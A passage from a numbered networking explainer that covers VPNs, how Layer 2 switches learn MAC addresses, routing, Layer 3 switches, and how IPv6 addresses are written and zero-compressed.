To allow employees from other places to access intranet resources, the solution to using VPN is to set up a VPN server on the intranet. After connecting to the Internet locally, the non-local employees connect to the VPN server through the Internet, and then enter the corporate intranet through the VPN server. In order to ensure data security, the communication data between the VPN server and the client is encrypted. With data encryption, it can be considered that data is transmitted securely on a dedicated data link, just like a dedicated network has been set up, but in fact VPN uses a public link on the Internet, so VPN is called Virtual private network, in essence, uses encryption technology to encapsulate a data communication tunnel on the public network. With VPN technology, users can use VPN to access intranet resources no matter they are on a business trip or working at home, as long as they can access the Internet, which is why VPN is so widely used in enterprises.
26. Layer 2 switch
Layer 2 switches work on Layer 2 (data link layer) of the OSI model, so they are called Layer 2 switches. The development of Layer 2 switching technology has been relatively mature. Layer 2 switches are data link layer devices that can identify the MAC address information in the data packet, forward according to the MAC address, and record these MAC addresses and corresponding ports in their own internal in an address table.
process
(1) When the switch receives a data packet from a certain port, it first reads the source MAC address in the packet header, so that it knows which port the machine with the source MAC address is connected to;
(2) Then read the destination MAC address in the packet header, and look up the corresponding port in the address table;
(3) If there is a port corresponding to the destination MAC address in the table, copy the data packet directly to this port;
(4) If the corresponding port cannot be found in the table, the data packet will be broadcast to all ports. When the destination machine responds to the source machine, the switch can learn which port the destination MAC address corresponds to. It is no longer necessary to broadcast to all ports.
This process is continuously cycled, and the MAC address information of the entire network can be learned. This is how a Layer 2 switch establishes and maintains its own address table.
27. Routing Technology
The router works at the third layer of the OSI model --- the network layer operation. Its working mode is similar to that of the second layer switching, but the router works at the third layer. This difference determines that routing and switching use different control information when transmitting packets. The way to realize the function is different. The working principle is that there is also a table inside the router. This table indicates where to go next if you want to go to a certain place. The information is added and forwarded; if the next step is not known, the packet is discarded, and then a message is returned to the source address.
Routing technology is essentially just two functions: determining the optimal route and forwarding data packets.
28. Layer 3 switch
A Layer 3 switch is a switch with some router functions. The most important purpose of a Layer 3 switch is to speed up data exchange within a large LAN. Regular processes such as data packet forwarding are implemented by hardware at high speed, while functions such as routing information update, routing table maintenance, routing calculation, and routing determination are implemented by software. Layer 3 switching technology is Layer 2 switching technology + Layer 3 forwarding technology. The traditional switching technology operates on the second layer of the OSI network standard model - the data link layer, while the three-layer switching technology realizes the high-speed forwarding of data packets on the third layer of the network model, which can realize the network routing function , and can achieve optimal network performance according to different network conditions.
29. IPv6 address representation
The 128-bit address of IPv6 is usually written in 8 groups, and each group is in the form of four hexadecimal numbers. For example: AD80:0000:0000:0000:ABAA:0000:00C2:0002 is a valid IPv6 address. This address is relatively long, it seems inconvenient and not easy to write. Zero compression can be used to reduce its length. If the values of several consecutive segments are all 0, then these 0s can be simply represented by ::, and the above address can be written as AD80::ABAA:0000:00C2:0002. At the same time, leading zeros can be omitted, so 2001:0DB8:02de::0e13 is equivalent to 2001:DB8:2de::e13.
